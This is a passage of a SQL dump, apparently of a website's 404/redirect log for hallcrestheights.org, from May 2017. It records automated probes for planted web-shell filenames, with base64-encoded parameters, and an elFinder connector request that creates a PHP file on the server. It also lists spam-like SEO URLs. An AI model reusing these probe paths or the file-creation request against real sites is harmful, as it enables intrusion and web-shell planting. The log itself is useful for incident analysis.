00:00:00'),(8925,'http://hallcrestheights.org/functions.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:06:03','0000-00-00 00:00:00'),(8926,'http://hallcrestheights.org/cache/news.php?z3=M1Qyb0lvLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:06:37','0000-00-00 00:00:00'),(8927,'http://hallcrestheights.org/tmp.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',3,0,'2017-05-08 06:07:53','0000-00-00 00:00:00'),(8928,'http://hallcrestheights.org/shootme.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',7,0,'2017-05-08 06:09:11','0000-00-00 00:00:00'),(8929,'http://hallcrestheights.org/configurationbak.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:09:37','0000-00-00 00:00:00'),(8930,'http://hallcrestheights.org/robots.txt.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-08 06:09:56','0000-00-00 00:00:00'),(8931,'http://hallcrestheights.org/jconfig.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:11:02','0000-00-00 00:00:00'),(8932,'http://hallcrestheights.org/media/reads.php?z3=M1Qyb0lvLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:11:40','0000-00-00 00:00:00'),(8933,'http://hallcrestheights.org/media/1ndex.php?z3=M1Qyb0lvLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:12:01','0000-00-00 00:00:00'),(8934,'http://hallcrestheights.org/sql_dump.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:12:41','0000-00-00 00:00:00'),(8935,'http://hallcrestheights.org/error-logs.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:13:16','0000-00-00 00:00:00'),(8936,'http://hallcrestheights.org/media/404.php?z3=M1Qyb0lvLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:13:35','0000-00-00 00:00:00'),(8937,'http://hallcrestheights.org/media/tmp.php?z3=M1Qyb0lvLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:13:56','0000-00-00 00:00:00'),(8938,'http://hallcrestheights.org/log.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:14:29','0000-00-00 00:00:00'),(8939,'http://hallcrestheights.org/images/stories/0day.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:14:52','0000-00-00 00:00:00'),(8940,'http://hallcrestheights.org/includes/u2p.php?z3=M1Qyb0lvLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:15:06','0000-00-00 00:00:00'),(8941,'http://hallcrestheights.org/images/xxx.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:15:26','0000-00-00 00:00:00'),(8942,'http://hallcrestheights.org/al277.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:15:47','0000-00-00 00:00:00'),(8943,'http://hallcrestheights.org/roubt.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:16:12','0000-00-00 00:00:00'),(8944,'http://hallcrestheights.org/includes.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:16:33','0000-00-00 00:00:00'),(8945,'http://hallcrestheights.org/images/al277.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:16:56','0000-00-00 00:00:00'),(8946,'http://hallcrestheights.org/webconfig.txt.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:17:19','0000-00-00 00:00:00'),(8947,'http://hallcrestheights.org/cache/cachee.php?z3=M1Qyb0lvLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:18:05','0000-00-00 00:00:00'),(8948,'http://hallcrestheights.org/thumb.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:18:34','0000-00-00 00:00:00'),(8949,'http://hallcrestheights.org/configbak.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:19:38','0000-00-00 00:00:00'),(8950,'http://hallcrestheights.org/wp-main.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:20:04','0000-00-00 00:00:00'),(8951,'http://hallcrestheights.org/robot.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:20:33','0000-00-00 00:00:00'),(8952,'http://hallcrestheights.org/install.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:20:55','0000-00-00 00:00:00'),(8953,'http://hallcrestheights.org/images/1ndex.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:21:21','0000-00-00 00:00:00'),(8954,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=M1Qyb0lvLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:21:45','0000-00-00 00:00:00'),(8955,'http://hallcrestheights.org/resd.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:22:17','0000-00-00 00:00:00'),(8956,'http://hallcrestheights.org/injctory.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:22:41','0000-00-00 00:00:00'),(8957,'http://hallcrestheights.org/mmytc.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:22:59','0000-00-00 00:00:00'),(8958,'http://hallcrestheights.org/images/laj.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:23:45','0000-00-00 00:00:00'),(8959,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=M1Qyb0lvLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:24:02','0000-00-00 00:00:00'),(8960,'http://hallcrestheights.org/wsdl.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:24:25','0000-00-00 00:00:00'),(8961,'http://hallcrestheights.org/goog1es.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:24:44','0000-00-00 00:00:00'),(8962,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=M1Qyb0lvLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:25:21','0000-00-00 00:00:00'),(8963,'http://hallcrestheights.org/news.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:25:57','0000-00-00 00:00:00'),(8964,'http://hallcrestheights.org/SessionController.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:26:16','0000-00-00 00:00:00'),(8965,'http://hallcrestheights.org/maill.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:27:02','0000-00-00 00:00:00'),(8966,'http://hallcrestheights.org/error-log.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:27:45','0000-00-00 00:00:00'),(8967,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:28:04','0000-00-00 00:00:00'),(8968,'http://hallcrestheights.org/authenticating.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:28:26','0000-00-00 00:00:00'),(8969,'http://hallcrestheights.org/google-assist.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:28:43','0000-00-00 00:00:00'),(8970,'http://hallcrestheights.org/images/google-assist.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:29:00','0000-00-00 00:00:00'),(8971,'http://hallcrestheights.org/images/robots.txt.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:29:44','0000-00-00 00:00:00'),(8972,'http://hallcrestheights.org/elements.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:30:15','0000-00-00 00:00:00'),(8973,'http://hallcrestheights.org/xmlsrpc.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:30:33','0000-00-00 00:00:00'),(8974,'http://hallcrestheights.org/wp-cache.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:30:56','0000-00-00 00:00:00'),(8975,'http://hallcrestheights.org/images/404.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:31:13','0000-00-00 00:00:00'),(8976,'http://hallcrestheights.org/images/head.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:31:26','0000-00-00 00:00:00'),(8977,'http://hallcrestheights.org/cache/support.php?z3=M1Qyb0lvLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:32:14','0000-00-00 00:00:00'),(8978,'http://hallcrestheights.org/RoseLeif.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-08 06:32:34','0000-00-00 00:00:00'),(8979,'http://hallcrestheights.org/Abbrevsprl.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:33:37','0000-00-00 00:00:00'),(8980,'http://hallcrestheights.org/show.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-05-08 06:35:53','0000-00-00 00:00:00'),(8981,'http://hallcrestheights.org/images/defau1t.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:36:05','0000-00-00 00:00:00'),(8982,'http://hallcrestheights.org/cli/40dd1d.php?z3=M1Qyb0lvLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:36:19','0000-00-00 00:00:00'),(8983,'http://hallcrestheights.org/bk.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:36:45','0000-00-00 00:00:00'),(8984,'http://hallcrestheights.org/infos.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:37:29','0000-00-00 00:00:00'),(8985,'http://hallcrestheights.org/cache/defau1t.php?z3=M1Qyb0lvLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:37:48','0000-00-00 00:00:00'),(8986,'http://hallcrestheights.org/A.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:38:12','0000-00-00 00:00:00'),(8987,'http://hallcrestheights.org/bookmark.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:38:41','0000-00-00 00:00:00'),(8988,'http://hallcrestheights.org/wp-data.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:39:27','0000-00-00 00:00:00'),(8989,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:39:46','0000-00-00 00:00:00'),(8990,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:40:13','0000-00-00 00:00:00'),(8991,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:40:33','0000-00-00 00:00:00'),(8992,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:40:58','0000-00-00 00:00:00'),(8993,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:41:14','0000-00-00 00:00:00'),(8994,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-05-08 06:41:45','0000-00-00 00:00:00'),(8995,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:42:08','0000-00-00 00:00:00'),(8996,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:42:31','0000-00-00 00:00:00'),(8997,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:42:51','0000-00-00 00:00:00'),(8998,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:43:47','0000-00-00 00:00:00'),(8999,'http://hallcrestheights.org/head.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:44:01','0000-00-00 00:00:00'),(9000,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:44:42','0000-00-00 00:00:00'),(9001,'http://hallcrestheights.org/cache/list.php?z3=M1Qyb0lvLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:45:01','0000-00-00 00:00:00'),(9002,'http://hallcrestheights.org/images/interface.php?z3=M1Qyb0lvLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:45:32','0000-00-00 00:00:00'),(9003,'http://hallcrestheights.org/sqldebug.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:45:58','0000-00-00 00:00:00'),(9004,'http://hallcrestheights.org/xmlrpc-activate.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:46:19','0000-00-00 00:00:00'),(9005,'http://hallcrestheights.org/keep.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:47:36','0000-00-00 00:00:00'),(9006,'http://hallcrestheights.org/tmpos.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:48:22','0000-00-00 00:00:00'),(9007,'http://hallcrestheights.org/link.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:48:46','0000-00-00 00:00:00'),(9008,'http://hallcrestheights.org/dcodzu.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:49:42','0000-00-00 00:00:00'),(9009,'http://hallcrestheights.org/codd.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:50:04','0000-00-00 00:00:00'),(9010,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=M1Qyb0lvLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:50:49','0000-00-00 00:00:00'),(9011,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=M1Qyb0lvLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:51:14','0000-00-00 00:00:00'),(9012,'http://hallcrestheights.org/content.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:51:39','0000-00-00 00:00:00'),(9013,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:52:01','0000-00-00 00:00:00'),(9014,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:52:37','0000-00-00 00:00:00'),(9015,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=M1Qyb0lvLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:53:02','0000-00-00 00:00:00'),(9016,'http://hallcrestheights.org/shootmei.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:53:32','0000-00-00 00:00:00'),(9017,'http://hallcrestheights.org/dcodqg.php?z3=M1Qyb0lvLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-05-08 06:54:05','0000-00-00 00:00:00'),(9018,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/3T2oIo.php',NULL,'','',1,0,'2017-05-08 06:54:37','0000-00-00 00:00:00'),(9019,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/3T2oIo.php',NULL,'','',1,0,'2017-05-08 06:54:51','0000-00-00 00:00:00'),(9020,'http://hallcrestheights.org/wp-content/uploads/3T2oIo.php',NULL,'','',1,0,'2017-05-08 06:55:06','0000-00-00 00:00:00'),(9021,'http://hallcrestheights.org/3T2oIo.php',NULL,'','',1,0,'2017-05-08 06:55:17','0000-00-00 00:00:00'),(9022,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/3T2oIo.php',NULL,'','',1,0,'2017-05-08 06:55:31','0000-00-00 00:00:00'),(9023,'http://hallcrestheights.org/_file-manager/php/connector.php?cmd=mkfile&name=xsamxadooup.php&target=l1_Lw',NULL,'','',1,0,'2017-05-08 07:04:46','0000-00-00 00:00:00'),(9024,'http://hallcrestheights.org/xsamxadooup.php',NULL,'','',1,0,'2017-05-08 07:04:47','0000-00-00 00:00:00'),(9025,'http://www.hallcrestheights.org/bsoa-i20162637-k6245-pazapst-asgmhcq-cmckf/',NULL,'','',2,0,'2017-05-08 08:14:09','0000-00-00 00:00:00'),(9026,'http://www.hallcrestheights.org/k12680-gnfznxvj-xpalt-itjshkyj-i20162631-yldpija.htm',NULL,'','',1,0,'2017-05-08 08:29:49','0000-00-00 00:00:00'),(9027,'http://www.hallcrestheights.org/lugdlt-rsmxxh-k32936-ypzqjl-lzoh-i20162632-njumnt-ecwfog.htm',NULL,'','',2,0,'2017-05-08 09:13:41','0000-00-00 00:00:00'),(9028,'http://www.hallcrestheights.org/i20162628-upttm-nbea-k13784-tgrb-nqcdcncx-rdhcpgzz-dllimv.htm',NULL,'','',3,0,'2017-05-08 11:04:34','0000-00-00 00:00:00'),(9029,'http://www.hallcrestheights.org/edzvdl-i20162629-qcomnn-k46256-mmcawv-bfuj-apyvrl-flxhqj.htm',NULL,'','',2,0,'2017-05-08 11:48:55','0000-00-00 00:00:00'),(9030,'http://www.hallcrestheights.org/k23480-edzvdlqc-omnnm-mcawvbfu-i20162635-japyvrl.htm',NULL,'','',3,0,'2017-05-08 11:55:11','0000-00-00 00:00:00'),(9031,'http://www.hallcrestheights.org/cwhriwg-i20162636-pekzq-dwkvum-k32533-zbsaii-mjzfo/',NULL,'','',2,0,'2017-05-08 12:17:55','0000-00-00 00:00:00'),(9032,'http://www.hallcrestheights.org/i20162635-qlbow-ciggec-k46177-eayaf-xrgl-nikghhm/',NULL,'','',4,0,'2017-05-08 14:12:35','0000-00-00 00:00:00'),(9033,'http://www.hallcrestheights.org/k45692-zmku-edtzjiv-i20162630-yoqxi-fgxuhx.htm',NULL,'','',2,0,'2017-05-08 15:05:42','0000-00-00 00:00:00'),(9034,'http://www.hallcrestheights.org/fadlaj-fnlgfp-k48776-cvwgmy-i20162637-hdec-wxbdeu-dkovfi.htm',NULL,'','',2,0,'2017-05-08 15:54:27','0000-00-00 00:00:00'),(9035,'http://www.hallcrestheights.org/i20162628-k33884-mrcqg-beif-uwgr-abtnwyrq.htm',NULL,'','',2,0,'2017-05-08 16:16:27','0000-00-00 00:00:00'),(9036,'http://www.hallcrestheights.org/nfrkopdo-i20162629-bbum-golzesr-kwtzqtqb-svjcwjbx-k32441-nmyv/',NULL,'','',2,0,'2017-05-08 20:34:13','0000-00-00 00:00:00'),(9037,'http://www.hallcrestheights.org/nfrkopdo-bbum-golzesr-i20162635-kwtzqtqb-svjcwjbx-nmyv-k18661-sssl/',NULL,'','',2,0,'2017-05-08 20:54:38','0000-00-00 00:00:00'),(9038,'http://www.hallcrestheights.org/ryvhrh-mqtyys-k12236-llgeaj-anpd-i20162632-mefnxh-qfhjdy.htm',NULL,'','',2,0,'2017-05-08 20:59:11','0000-00-00 00:00:00'),(9039,'http://www.hallcrestheights.org/i20162636-k51884-vqjny-spvh-oljp-eurrtpil.htm',NULL,'','',46,0,'2017-05-08 22:11:21','0000-00-00 00:00:00'),(9040,'http://www.hallcrestheights.org/i20162630-vqjn-yspvhol-k45592-jpeur-rtpilu-ourxivl.htm',NULL,'','',2,0,'2017-05-08 22:38:36','0000-00-00 00:00:00'),(9041,'http://www.hallcrestheights.org/i20162634-kzpff-msxklr-dedhw-gefv-bbgzagp-k49217-eciyyuwu/',NULL,'','',2,0,'2017-05-08 22:45:44','0000-00-00 00:00:00'),(9042,'http://www.hallcrestheights.org/soegszxy-i20162629-k12041-ifet-vtndyuu-hvfcyzls/',NULL,'','',1,0,'2017-05-08 23:13:47','0000-00-00 00:00:00'),(9043,'http://www.hallcrestheights.org/i20162630-k50380-gnfznxvj-xpalt-itjshkyj-yldpija-amdu.htm',NULL,'','',2,0,'2017-05-08 23:29:48','0000-00-00 00:00:00'),(9044,'http://www.hallcrestheights.org/edzv-dlqcomn-i20162630-k61232-nmmca-wvbfuj-apyvrlf-lxhqjkuh.htm',NULL,'','',2,0,'2017-05-08 23:40:05','0000-00-00 00:00:00'),(9045,'http://hallcrestheights.org/libraries/lol.php',NULL,'','',2,0,'2017-05-08 23:40:19','0000-00-00 00:00:00'),(9046,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-i20162628-krbzomsm-k13984-vuclzuph.htm',NULL,'','',2,0,'2017-05-09 03:19:56','0000-00-00 00:00:00'),(9047,'http://www.hallcrestheights.org/kzpff-msxklr-i20162634-dedhw-gefv-k28417-bbgzagp-eciyyuwu-vfztjigj/',NULL,'','',2,0,'2017-05-09 03:48:48','0000-00-00 00:00:00'),(9048,'http://www.hallcrestheights.org/i20162635-tkuykfjd-k18061-njjb-ucyupaj-aylrlwfv-dyruqpkl/',NULL,'','',2,0,'2017-05-09 04:09:23','0000-00-00 00:00:00'),(9049,'http://www.hallcrestheights.org/k11780-edzvdlqc-omnnm-mcawvbfu-i20162631-japyvrl.htm',NULL,'','',1,0,'2017-05-09 04:15:24','0000-00-00 00:00:00'),(9050,'http://www.hallcrestheights.org/k40832-jgle-tkymdrq-i20162630-znrvm-lkswaz.htm',NULL,'','',2,0,'2017-05-09 06:32:53','0000-00-00 00:00:00'),(9051,'http://www.hallcrestheights.org/ajqxx-i20162637-k12077-ucuzao-fifep-hiij/',NULL,'','',2,0,'2017-05-09 08:30:42','0000-00-00 00:00:00'),(9052,'http://www.hallcrestheights.org/k60640-pcscqruf-unpkw-i20162637-xpoideot-wtvsoar-mosm.htm',NULL,'http://search.yahoo.co.jp/','',1,0,'2017-05-09 08:54:31','0000-00-00 00:00:00'),(9053,'http://www.hallcrestheights.org/nfrko-k24277-pdobbu-mgolz-i20162635-esrk-wtzqtqb-svjcwjbx-nmyvsssl/',NULL,'','',1,0,'2017-05-09 11:23:02','0000-00-00 00:00:00'),(9054,'http://www.hallcrestheights.org/k11384-dvisc-i20162637-iwbv-wkux-krbzomsm.htm',NULL,'','',7,0,'2017-05-09 16:09:28','0000-00-00 00:00:00'),(9055,'http://www.hallcrestheights.org/upttmnbe-i20162635-atgrb-k24080-nqcdcncx-rdhcpgz-zdll-imvyx.htm',NULL,'','',2,0,'2017-05-09 16:21:35','0000-00-00 00:00:00'),(9056,'http://www.hallcrestheights.org/soegs-zxyife-i20162634-tvtnd-yuuh-vfcyzls-k49117-xxqroxae-hkskxyxe/',NULL,'','',1,0,'2017-05-09 20:37:07','0000-00-00 00:00:00'),(9057,'http://www.hallcrestheights.org/nfrko-k25577-pdobbu-mgolz-i20162635-esrk/',NULL,'','',1,0,'2017-05-10 11:42:30','0000-00-00 00:00:00'),(9058,'http://hallcrestheights.org/wp-json/wp/v2/posts',NULL,'https://my.alipay.com/portal/i.htm','',1,0,'2017-05-10 14:32:25','0000-00-00 00:00:00'),(9059,'http://www.hallcrestheights.org//license.php',NULL,'','',2,0,'2017-05-11 03:36:09','0000-00-00 00:00:00'),(9060,'http://hallcrestheights.org/components/com_docman/themes/default/language/excekkent.php',NULL,'http://hallcrestheights.org/components/com_docman/themes/default/language/excekkent.php','',2,0,'2017-05-11 04:09:34','0000-00-00 00:00:00'),(9061,'http://hallcrestheights.org/components/com_content/backup.php',NULL,'http://hallcrestheights.org/components/com_content/backup.php','',2,0,'2017-05-11 04:09:34','0000-00-00 00:00:00'),(9062,'http://hallcrestheights.org/components/com_adsmanager/views/details/tmpl/backup.php',NULL,'http://hallcrestheights.org/components/com_adsmanager/views/details/tmpl/backup.php','',2,0,'2017-05-11 04:09:34','0000-00-00 00:00:00'),(9063,'http://hallcrestheights.org/components/com_contact/com_contact.php',NULL,'http://hallcrestheights.org/components/com_contact/com_contact.php','',4,0,'2017-05-11 04:09:34','0000-00-00 00:00:00'),(9064,'http://hallcrestheights.org/components/.lib_uninsr.php',NULL,'http://hallcrestheights.org/components/.lib_uninsr.php','',2,0,'2017-05-11 04:09:34','0000-00-00 00:00:00'),(9065,'http://hallcrestheights.org/components/com_content/models/forms/backup.php',NULL,'http://hallcrestheights.org/components/com_content/models/forms/backup.php','',2,0,'2017-05-11 04:09:34','0000-00-00 00:00:00'),(9066,'http://hallcrestheights.org/components/com_adsmanager/views/details/tmpl/update.php',NULL,'http://hallcrestheights.org/components/com_adsmanager/views/details/tmpl/update.php','',2,0,'2017-05-11 04:09:37','0000-00-00 00:00:00'),(9067,'http://hallcrestheights.org/components/com_hello/hello.php',NULL,'http://hallcrestheights.org/components/com_hello/hello.php','',4,0,'2017-05-11 04:10:10','0000-00-00 00:00:00'),(9068,'http://hallcrestheights.org/components/com_jce/editor/elements/dmsxe.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/elements/dmsxe.php','',2,0,'2017-05-11 04:10:10','0000-00-00 00:00:00'),(9069,'http://hallcrestheights.org/components/com_users/views/login/backup.php',NULL,'http://hallcrestheights.org/components/com_users/views/login/backup.php','',2,0,'2017-05-11 04:10:10','0000-00-00 